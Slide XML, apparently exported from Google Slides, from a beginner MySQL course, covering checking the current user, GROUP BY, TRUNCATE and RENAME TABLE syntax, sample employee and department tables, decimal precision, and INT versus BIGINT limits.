          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2928" name="Google Shape;2928;p474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="195250"/>
            <a:ext cx="8520600" cy="118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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check from which mysql user we are logged in in mysql ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2929" name="Google Shape;2929;p474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474975" y="1840350"/>
            <a:ext cx="7093200" cy="23118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n" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySql &gt; select current_user();</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySql &gt; select user();</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2934" name="Google Shape;2934;p475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112450" y="921200"/>
            <a:ext cx="8792100" cy="31569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b="1" lang="en" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GROUP BY </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STATEMENT / </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLAUSE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2939" name="Google Shape;2939;p476"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25396" l="0" r="0" t="35460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="177313" y="1604138"/>
            <a:ext cx="8789376" cy="1935225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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47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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to remove all records from the table?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2945" name="Google Shape;2945;p477"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1883675" y="1383650"/>
            <a:ext cx="5487600" cy="25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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>truncate table &lt;tableName&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>truncate table emp;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2950" name="Google Shape;2950;p47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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to rename the existing tableName?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2951" name="Google Shape;2951;p478"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755475" y="1587100"/>
            <a:ext cx="7873500" cy="25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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RENAME TABLE &lt;oldTableName&gt; TO &lt;newTableName&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RENAME TABLE dep TO dept;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 2955"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2956" name="Google Shape;2956;p479"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1171875"/>
            <a:ext cx="8374500" cy="397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600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Emp (empno,ename,job,deptno,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sal,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comm,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hiredate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dept(deptno,dname,loc)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sal = salary,loc = location,dname=departmentName,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comm=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commission</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2957" name="Google Shape;2957;p479"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="382725"/>
            <a:ext cx="73161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SQL Assignments 1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2962" name="Google Shape;2962;p480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749075" y="429125"/>
            <a:ext cx="7515900" cy="27666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sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decimal(8,2) -&gt; 999999.99</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decimal(9,2) -&gt; 9999999.99</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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6" name="Shape 2966"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2967" name="Google Shape;2967;p481"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="342900"/>
            <a:ext cx="9144000" cy="4800595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Shape 2971"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2972" name="Google Shape;2972;p482"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="224050"/>
            <a:ext cx="8520600" cy="20247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sz="4600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.bbc.com/news/world-asia-30288542</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2973" name="Google Shape;2973;p482"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1091775" y="2060775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="1005150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Before</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">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sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>After</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="598325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>INT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>BIGINT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="828100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2,147,483,647</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9,223,372,036,854,775,808</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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
        <p:nvSpPr>
          <p:cNvPr id="2978" name="Google Shape;2978;p483"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="382725"/>
            <a:ext cx="73161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Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2979" name="Google Shape;2979;p483"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="139925" y="1241975"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="806050"/>
                <a:gridCol w="1033075"/>
                <a:gridCol w="1078575"/>
                <a:gridCol w="556525"/>
                <a:gridCol w="1160700"/>
                <a:gridCol w="1203275"/>
                <a:gridCol w="837300"/>
                <a:gridCol w="1037175"/>
                <a:gridCol w="1238175"/>
              </a:tblGrid>
              <a:tr h="367000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EmpId</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
